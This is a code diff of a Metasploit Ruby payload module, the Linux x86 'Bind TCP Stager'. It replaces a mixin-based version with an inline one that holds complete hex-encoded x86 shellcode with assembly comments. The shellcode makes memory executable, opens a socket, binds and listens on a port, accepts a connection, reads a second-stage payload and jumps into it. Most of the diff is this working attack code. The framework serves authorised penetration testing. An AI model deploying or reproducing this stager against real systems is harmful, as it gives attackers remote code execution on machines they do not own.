|
6 | 6 |
|
7 | 7 | require 'msf/core'
|
8 | 8 | require 'msf/core/handler/bind_tcp'
|
9 |
| -require 'msf/core/payload/linux/bind_tcp' |
10 | 9 |
|
11 |
| -module Metasploit4 |
12 | 10 |
|
13 |
| - CachedSize = :dynamic |
| 11 | +### |
| 12 | +# |
| 13 | +# BindTcp |
| 14 | +# ------- |
| 15 | +# |
| 16 | +# Linux bind TCP stager. |
| 17 | +# |
| 18 | +### |
| 19 | +module Metasploit3 |
| 20 | + |
| 21 | + CachedSize = 79 |
14 | 22 |
|
15 | 23 | include Msf::Payload::Stager
|
16 |
| - include Msf::Payload::Linux::BindTcp |
| 24 | + include Msf::Payload::Linux |
17 | 25 |
|
18 | 26 | def initialize(info = {})
|
19 | 27 | super(merge_info(info,
|
20 |
| - 'Name' => 'Bind TCP Stager (Linux x86)', |
21 |
| - 'Description' => 'Listen for a connection (Linux x86)', |
22 |
| - 'Author' => [ 'skape', 'egypt', ], |
| 28 | + 'Name' => 'Bind TCP Stager', |
| 29 | + 'Description' => 'Listen for a connection', |
| 30 | + 'Author' => [ |
| 31 | + 'skape', # original |
| 32 | + 'egypt', # NX support |
| 33 | + ], |
23 | 34 | 'License' => MSF_LICENSE,
|
24 | 35 | 'Platform' => 'linux',
|
25 | 36 | 'Arch' => ARCH_X86,
|
26 | 37 | 'Handler' => Msf::Handler::BindTcp,
|
27 |
| - 'Convention' => 'sockedi', |
28 |
| - 'Stager' => { 'RequiresMidstager' => true } |
| 38 | + 'Stager' => |
| 39 | + { |
| 40 | + 'Offsets' => |
| 41 | + { |
| 42 | + 'LPORT' => [ 0x29, 'n' ], |
| 43 | + }, |
| 44 | + 'Payload' => |
| 45 | + |
| 46 | + "\x6a\x7d" +# push byte +0x7d |
| 47 | + "\x58" +# pop eax |
| 48 | + "\x99" +# cdq |
| 49 | + "\xb2\x07" +# mov dl,0x7 |
| 50 | + "\xb9\x00\x10\x00\x00" +# mov ecx,0x1000 |
| 51 | + "\x89\xe3" +# mov ebx,esp |
| 52 | + "\x66\x81\xe3\x00\xf0" +# and bx,0xf000 |
| 53 | + "\xcd\x80" +# int 0x80 |
| 54 | + "\x31\xdb" +# xor ebx,ebx |
| 55 | + "\xf7\xe3" +# mul ebx |
| 56 | + "\x53" +# push ebx |
| 57 | + "\x43" +# inc ebx |
| 58 | + "\x53" +# push ebx |
| 59 | + "\x6a\x02" +# push byte +0x2 |
| 60 | + "\x89\xe1" +# mov ecx,esp |
| 61 | + "\xb0\x66" +# mov al,0x66 |
| 62 | + "\xcd\x80" +# int 0x80 |
| 63 | + "\x5b" +# pop ebx |
| 64 | + "\x5e" +# pop esi |
| 65 | + "\x52" +# push edx |
| 66 | + "\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002 |
| 67 | + "\x6a\x10" +# push byte +0x10 |
| 68 | + "\x51" +# push ecx |
| 69 | + "\x50" +# push eax |
| 70 | + "\x89\xe1" +# mov ecx,esp |
| 71 | + "\x6a\x66" +# push byte +0x66 |
| 72 | + "\x58" +# pop eax |
| 73 | + "\xcd\x80" +# int 0x80 |
| 74 | + "\xd1\xe3" +# shl ebx,1 |
| 75 | + "\xb0\x66" +# mov al,0x66 |
| 76 | + "\xcd\x80" +# int 0x80 |
| 77 | + "\x43" +# inc ebx |
| 78 | + "\xb0\x66" +# mov al,0x66 |
| 79 | + "\x89\x51\x04" +# mov [ecx+0x4],edx |
| 80 | + "\xcd\x80" +# int 0x80 |
| 81 | + "\x93" +# xchg eax,ebx |
| 82 | + "\xb6\x0c" +# mov dh,0xc |
| 83 | + "\xb0\x03" +# mov al,0x3 |
| 84 | + "\xcd\x80" +# int 0x80 |
| 85 | + "\x89\xdf" +# mov edi,ebx |
| 86 | + "\xff\xe1" # jmp ecx |
| 87 | + |
| 88 | + } |
29 | 89 | ))
|
30 | 90 | end
|
31 | 91 |
|
|